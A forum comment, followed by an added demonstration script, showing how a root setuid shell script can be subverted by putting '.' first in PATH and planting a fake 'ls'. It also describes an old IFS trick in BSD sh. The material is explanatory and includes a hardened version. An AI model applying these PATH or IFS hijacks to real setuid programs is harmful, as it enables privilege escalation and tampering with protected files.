Potential warning: 10.3.9 disables SUID/SGID flag
Authored by: jeremyp on Apr 19, '05 12:18:43PM
Allowing setuid scripts is extremely dangerous. Look at the following session

jeremyp@titania:test$/bin/ls -l
total 24
-rw-r--r--  1 root     staff  11 19 Apr 16:40 foo.txt
-rwxr-xr-x  1 jeremyp  staff  23 19 Apr 16:29 ls
-rwsr-xr-x  1 root     staff  14 19 Apr 16:28 mysh
jeremyp@titania:test$more foo.txt
not hacked
jeremyp@titania:test$echo $PATH
.:/Developer/qt/bin:/Users/jeremyp/unix/bin:/bin:/sbin:/usr/bin:/usr/sbin
:/sbin:/usr/sbin:/usr/local/bin:/Library/MySQL/bin:/usr/X11R6/bin:/opt/local/bin
jeremyp@titania:test$more ls
echo "hacked" >foo.txt
jeremyp@titania:test$more mysh
#!/bin/sh

ls
jeremyp@titania:test$mysh
jeremyp@titania:test$more foo.txt
hacked

What is happening here?

I'm logged in as jeremyp and, although I'm using 10.3.9, I have the flag set that disables the new behaviour.

In the directory I have a file called foo.txt which is owned by root and not writeable by me (jeremyp). There is also a root setuid script which I am going to use to compromise foo.txt. Assume somebody else set both of these up. I cat the setuid script looking for a suitable command to attack and find it makes use of ls so I set my path to look in . first and create an alternative version of ls that performs my skulduggery. Then I run the setuid script and hey presto, the read only file is hacked.

Obviously, in real life I could and should defensively program the setuid script so that it is not vulnerable, but there may be other less obvious holes. At University, for instance, we discovered that, in BSD 4.2 sh, if you changed the IFS variable to contain a "p", the word "export" looked like "ex ort", which meant that virtually any script you could name, setuid or otherwise, started with an invocation of a text editor. In a root setuid script that meant you had the ability to write to any file you like on the system.

Edit: Added line break...

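The PATH hijack in the comment above, reproduced as an added example that is not part of the original post. It needs no setuid bit and no root: it only shows the command-resolution half of the attack (a bare "ls" in the script resolving to the attacker's ./ls because "." is first in PATH) and puts a hardened version of the same script beside it. The scratch directory, the file names and the run_demo function are all constructed for this example.

```shell
#!/bin/sh
# Added example (not from the original comment): reproduce the PATH-hijack
# mechanics from the post in a throwaway directory, without any setuid bit,
# and compare the posted script with a hardened variant.

set -u

# run_demo <vulnerable|hardened>
# Builds the scenario from the post in a fresh temp dir, runs the chosen
# version of "mysh" with an attacker-controlled PATH, and prints the final
# contents of foo.txt so the caller can check what happened.
run_demo() {
    mode=$1
    work=$(mktemp -d) || return 1
    (
        cd "$work" || exit 1
        printf 'not hacked\n' > foo.txt

        # Attacker's fake "ls" dropped into the working directory, as in the post.
        printf '#!/bin/sh\necho "hacked" > foo.txt\n' > ls
        chmod +x ls

        if [ "$mode" = vulnerable ]; then
            # The script exactly as posted: a bare "ls" is looked up via the
            # caller's PATH, so "." first in PATH means ./ls wins.
            printf '#!/bin/sh\n\nls\n' > mysh
        else
            # Hardened: set PATH and IFS ourselves instead of trusting the
            # caller's environment, and call the binary by absolute path.
            # (unset IFS gives the POSIX default of space, tab, newline.)
            cat > mysh <<'EOF'
#!/bin/sh
PATH=/bin:/usr/bin
export PATH
unset IFS
/bin/ls
EOF
        fi
        chmod +x mysh

        # Attacker's environment from the post: "." first in PATH.
        PATH=".:/bin:/usr/bin" ./mysh > /dev/null
        cat foo.txt
    )
    status=$?
    rm -rf "$work"
    return $status
}

# Stand-alone run: show both outcomes side by side.
printf 'posted script:   foo.txt now reads "%s"\n' "$(run_demo vulnerable)"
printf 'hardened script: foo.txt now reads "%s"\n' "$(run_demo hardened)"
```

The hardened script only closes the hole the comment demonstrates; as the comment itself goes on to say, a setuid script can be subverted in less obvious ways (the IFS trick against the old BSD sh being one), which is why allowing setuid scripts at all is the real problem, not this one bare command.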